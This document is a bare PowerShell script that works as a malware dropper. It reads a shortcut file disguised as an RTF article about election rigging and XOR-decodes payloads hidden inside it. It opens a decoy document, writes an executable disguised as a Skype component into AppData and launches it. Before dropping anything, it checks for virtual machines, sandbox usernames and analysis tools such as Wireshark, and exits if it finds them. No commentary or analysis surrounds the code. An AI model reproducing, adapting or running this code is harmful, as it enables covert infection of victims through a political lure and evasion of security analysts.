function pl_dropper ($ifd, $os, $len, $dpath) { $dpath = [Environment]::ExpandEnvironmentVariables($dpath) $pdir = Split-Path -Parent $dpath if ($pdir) { $b = Test-Path $pdir } else { $b = $True } if (!$b) { New-Item -ItemType directory -Path $pdir | out-null } $name = Split-Path -Leaf $dpath $pathlist = @($dpath, "%APPDATA%\$name", "%TEMP%\$name") ForEach ($dpath in $pathlist) { $dpath = [Environment]::ExpandEnvironmentVariables($dpath) try { $ofd = [IO.File]::Open($dpath, [IO.FileMode]::OpenOrCreate, [IO.FileAccess]::Write); } catch [Exception] { continue; } CopyFilePart $ifd $os $len $ofd $ofd.close() break } return $dpath } function CreateFile($path, $acc) { $MethodDefinition = @' [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)] public static extern Microsoft.Win32.SafeHandles.SafeFileHandle CreateFile( string fileName, [MarshalAs(UnmanagedType.U4)] System.IO.FileAccess fileAccess, [MarshalAs(UnmanagedType.U4)] System.IO.FileShare fileShare, IntPtr securityAttributes, [MarshalAs(UnmanagedType.U4)] System.IO.FileMode creationDisposition, [MarshalAs(UnmanagedType.U4)] System.IO.FileAttributes flags, IntPtr template); '@ $Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -Namespace 'Win32' -PassThru $handle = $Kernel32::CreateFile($path, $acc, [IO.FileShare]::ReadWrite, 0, [IO.FileMode]::OpenOrCreate, [IO.FileAttributes]::Normal, 0) $fs = New-Object IO.FileStream($handle, $acc) return $fs } function xor_decode($b, $l, $k) { for($i = 0; $i -lt $l; $i++) { $b[$i] = $b[$i] -bxor $k } } function CopyFilePart([IO.FileStream] $ifd, $os, $len, [IO.FileStream] $ofd) { $tmpbuf = New-Object byte[] 8182 $buflen = $tmpbuf.Length $ifd.Seek($os, [IO.SeekOrigin]::Begin) | out-null while ($len -gt 0) { $ifd.Read($tmpbuf, 0, $buflen) | out-null xor_decode $tmpbuf $buflen 0x41 $ofd.Write($tmpbuf, 0, $buflen) $len -= $buflen if ($buflen -gt $len) { $buflen = $len } } } function get_susp_rating() { $score = 0 $lst = gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_BIOS" ForEach ($x in $lst) { $tmp = $x.SMBIOSBIOSVersion.ToLower() if ($tmp.contains("virtualbox") -or $tmp.contains("vmware")) { $score += 2 } $tmp = $x.SerialNumber.ToLower() if ($tmp.contains("vmware")) { $score += 2 } } $lst = gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_PnPEntity" ForEach ($x in $lst) { if ($x.DeviceId.contains("PCI\VEN_80EE&DEV_CAFE")) { $score += 2} } if ($score -gt 2) {return $score} $myarr = @("user", "admin", "administrator", "user1") $lst = gwmi -namespace root\cimv2 -query "Select * from Win32_ComputerSystem" ForEach ($comp in $lst) { if (!$comp.PartOfDomain) { $score += 1 } $tmp = $comp.UserName.ToLower() if ($tmp.contains("admin")) { $score += 2 } ForEach ($x in $myarr) { if ($tmp.contains($x)) { $score += 1 } } } if ($score -gt 2) {return $score} $myarr = @("procexp.exe", "taskmgr.exe", "wireshark.exe") $lst = gwmi -namespace root\cimv2 -query "SELECT * FROM Win32_Process" ForEach ($item in $lst) { $tmp = $item.ExecutablePath if (!$tmp) { $tmp = "" } $tmp = $tmp.ToLower() ForEach ($x in $myarr) { if ($tmp.contains($x)) { $score += 3 } } } if ($score -gt 2) {return $score} $myarr = @("sample") $tmp = (Get-Item -Path ".\" -Verbose).FullName ForEach ($x in $myarr) { if ($tmp.contains($x)) { $score += 1 } } $nm = Split-Path -Leaf $x $l = $nm.Split('.')[0].Length if ($l -eq 32 -or $l -eq 40 -or $l -eq 64) { $score += 3 } return $score; } function heat_proc() { $s = 0 For ($i=1; $i -lt 53; $i++) { $s += ($i + ($i * $s)) % $i } Exit 0 } function detect_susp_environ() { $score = get_susp_rating if ($score -gt 3) { heat_proc } } $acc = [IO.FileAccess]::READ $lnkfd = CreateFile "37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk" $acc; detect_susp_environ $os = 0x892e0 $l = 0x9fdda - $os $fpath = pl_dropper $lnkfd $os $l "%TEMP%\37486-the-shocking-truth-about-election-rigging-in-america.rtf" Invoke-Item "$fpath" $os = 0x0dac $l = 0x37ac - $os $cfpath = pl_dropper $lnkfd $os $l "%APPDATA%\Skype\hqwsys.exe" $os = 0x37ac $len = 0x892e0 - $os $ppath = pl_dropper $lnkfd $os $len "%TEMP%\1630357403074.png" start "$cfpath"